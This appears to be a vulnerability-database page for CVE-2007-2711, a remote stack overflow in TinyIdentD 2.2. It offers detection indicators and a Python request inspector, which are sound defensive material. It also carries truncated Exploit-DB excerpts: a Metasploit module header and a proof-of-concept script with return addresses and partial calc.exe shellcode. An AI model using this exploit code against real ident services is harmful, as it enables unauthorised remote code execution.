# CVE-2007-2711

Published: 2007-05-16

CVE-2007-2711: Stack-based buffer overflow in TinyIdentD 2.2 and earlier allows remote attackers to execute arbitrary code via a long string to TCP port 113.

Priority: P2 · 63 · critical · CVSS 2.0: 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 62.71% (99.1th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tinyirc | tinyidentd | <= 2.2 | — |
Detection & IOCs (extracted from sources)

Byte indicators:
- `\xeb\x20` followed by `, 28 : USERID : UNIX :`
- `\xeb\x20\x2c\x20\x32\x38\x20\x3a\x20\x55\x53\x45\x52\x49\x44\x20\x3a\x20\x55\x4e\x49\x58\x20\x3a\x20`
- `\x77\x13\x83\x7c` (jmp *%esi, XP kernel32.dll)
- `\xb1\x63\xd9\x77` (jmp *%esi, W2K rpcrt4.dll)

Detection guidance:
- Detect exploit attempts by monitoring TCP port 113 (ident) for inbound connections containing the byte sequence 0xEB 0x20 followed by the ASCII string `, 28 : USERID : UNIX :`; this is the fixed exploit header present in both the public PoC and the Metasploit module.
- Alert on ident (TCP/113) requests exceeding ~523 bytes; the exploit constructs a payload of exactly 523 bytes, including NOP sled and shellcode, to trigger the stack buffer overflow.
- Flag a payload space of 400 bytes with bad chars `\x00\x0d\x20\x0a` on TCP/113 as consistent with Metasploit module exploitation of this CVE.
- Presence of the return address 0x7c2d15e7 or 0x77f46eda packed little-endian within a TCP/113 request body is a strong indicator of targeted exploitation of CVE-2007-2711.

Caveats:
- The Metasploit return addresses (0x7c2d15e7 for Win2k SP4 EN, 0x77f46eda for WinXP SP2 IT) are OS/SP/language-specific; attackers targeting other platforms will use different addresses, so absence of these exact values does not rule out exploitation.
- The standalone PoC uses a different return address (0x7c831377 from XP kernel32.dll) than the Metasploit module; both target `jmp *%esi` / `call esi` gadgets but from different modules.
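The detection notes above can be turned into a small inspector for captured ident requests. The following is an added example, not code from the page's sources or from any IDS product: it checks a request body for the fixed exploit header, the ~523-byte length threshold, and the four return addresses named above (packed little-endian, as they would appear on the wire). The sample requests are constructed here for the test and contain no shellcode; the `classify` severity tiers are this example's own choice.

```python
"""Inspect ident (TCP/113) request bodies for CVE-2007-2711 exploit indicators.

Added example. Indicator values come from the detection notes above; the
sample requests and the severity tiers are constructed for this example.
"""
import struct

# Fixed header shared by the public PoC and the Metasploit module:
# a two-byte short jump (0xEB 0x20) followed by a fake ident reply fragment.
EXPLOIT_HEADER = b"\xeb\x20, 28 : USERID : UNIX :"

# Request length at which the exploit payload (NOP sled + shellcode) lands.
SUSPICIOUS_LENGTH = 523

# Return addresses from the Metasploit module and the standalone PoC, as
# 32-bit values; on the wire they appear little-endian (e.g. 0x7c831377 is
# the PoC's "\x77\x13\x83\x7c", 0x77d963b1 its "\xb1\x63\xd9\x77").
RETURN_ADDRESSES = {
    0x7C2D15E7: "Metasploit, Win2k SP4 EN",
    0x77F46EDA: "Metasploit, WinXP SP2 IT",
    0x7C831377: "PoC, XP kernel32.dll jmp *%esi",
    0x77D963B1: "PoC, W2K rpcrt4.dll jmp *%esi",
}


def packed(addr: int) -> bytes:
    """Little-endian 32-bit encoding of a return address, as sent on the wire."""
    return struct.pack("<I", addr)


def inspect_ident_request(data: bytes) -> list[str]:
    """Return the names of every indicator matched by one ident request body."""
    findings = []
    if EXPLOIT_HEADER in data:
        findings.append("exploit_header")
    if len(data) >= SUSPICIOUS_LENGTH:
        findings.append("oversized_request")
    for addr, label in RETURN_ADDRESSES.items():
        if packed(addr) in data:
            findings.append(f"return_address:{addr:#010x} ({label})")
    return findings


def classify(data: bytes) -> str:
    """Map findings to a severity tier (tiers are this example's convention).

    "exploit"    - the fixed header or a known return address is present
    "suspicious" - only the length threshold is exceeded
    "clean"      - nothing matched
    """
    findings = inspect_ident_request(data)
    if any(f == "exploit_header" or f.startswith("return_address:") for f in findings):
        return "exploit"
    if findings:
        return "suspicious"
    return "clean"


# Constructed samples: a normal RFC 1413 query, and a 523-byte request that
# carries the exploit header and the PoC return address with filler in place
# of any NOP sled or shellcode.
BENIGN_REQUEST = b"6193, 23\r\n"
SUSPICIOUS_REQUEST = EXPLOIT_HEADER + b"A" * 400 + packed(0x7C831377)
SUSPICIOUS_REQUEST += b"A" * (SUSPICIOUS_LENGTH - len(SUSPICIOUS_REQUEST))


if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("suspicious", SUSPICIOUS_REQUEST)):
        print(f"{name}: {classify(req)} {inspect_ident_request(req)}")
```

Running the module prints `clean []` for the RFC 1413 query and `exploit [...]` listing the header, the length, and the 0x7c831377 hit for the constructed request. In practice the header check is the strongest single signal because it is fixed across both public exploits; the return-address check should be read in light of the caveat above, since other platforms will use other addresses.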
No detection rules found.
Exploit-DB: TinyIdentD 2.2 - Remote Stack Buffer Overflow (Metasploit) (2010-09-20)
---
```ruby
##
# $Id: tiny_identd_overflow.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 'TinyIdentD 2.2 Stack Buffer Overflow',
  'Description' => %q{
    This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
    If we send a long string to the ident service we can overwrite the return
    address and execute arbitrary code. Credit to Maarten Boone.
  },
  'Author' => 'Jacopo Cervini ',
  'Version' => '$Revision: 10394 $',
  'References' =>
    [
      ['CVE'
```
Exploit-DB: TinyIdentD 2.2 - Remote Buffer Overflow (2007-05-14)
---
```python
#
#tinyidentd exploit code by
#thomas . pollet _at_ gmail . com
#bug by Maarten Boone
#
#usage: python exploit.py [target]
#
import socket,sys
#jmp into nop sled
payload = '\xeb\x20'
#ident crap
payload += ', 28 : USERID : UNIX : '
#nop sled
payload +='XXXX'
# jmp *%esi
payload += '\x77\x13\x83\x7c' #XP kernel32.dll
#payload += '\xb1\x63\xd9\x77' #W2K rpcrt4.dll
#metasploit alphanumeric shellcode calc.exe
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x44"
shellcode += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x41\x42\x32\x42"
shellcode += "\x41\x30\x42\x41\x58\x41\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b"
shellcode += "\x58\x51\x54
```
Metasploit: TinyIdentD 2.2 Stack Buffer Overflow

This module exploits a stack based buffer overflow in TinyIdentD version 2.2. If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone.
No writeups or analysis indexed.
References:
- http://osvdb.org/36053
- http://secunia.com/advisories/25248
- http://www.securityfocus.com/bid/23981
- http://www.vupen.com/english/advisories/2007/1825
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34298
- https://www.exploit-db.com/exploits/3925

Published: 2007-05-16